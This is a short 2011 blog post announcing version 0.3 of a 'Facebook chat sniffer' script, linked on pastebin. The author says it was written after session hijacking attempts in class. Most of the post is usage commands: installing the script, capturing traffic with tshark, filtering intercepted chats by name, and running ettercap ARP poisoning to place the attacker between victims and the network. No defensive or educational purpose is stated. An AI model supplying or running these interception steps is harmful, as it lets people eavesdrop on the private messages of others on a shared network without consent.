Powered By Blogger

Monday, July 11, 2011

[Version 0.3] Facebook chat sniffer

I threw this together in class yesterday because facebook was kicking me out when i tried to session hijack.

Version 0.3 http://pastebin.com/qNGuK9ix

save to fbsniff.py, set permissions, copy to sbin

Code:
chmod 755 fbsniff.py
cp fbsniff.py /usr/sbin/fbsniff

start the sniffer
Code:
tshark -i <interface> -w out.cap

start fbsniff
Code:
fbsniff -c out.pcap -l

you can also run it with a basic message filters
Code:
fbsniff -c out.pcap -f "Keegan,Test"

start ettercap
Code:
ettercap -T -M arp -i <interface> // // -P autoadd

No comments:

Post a Comment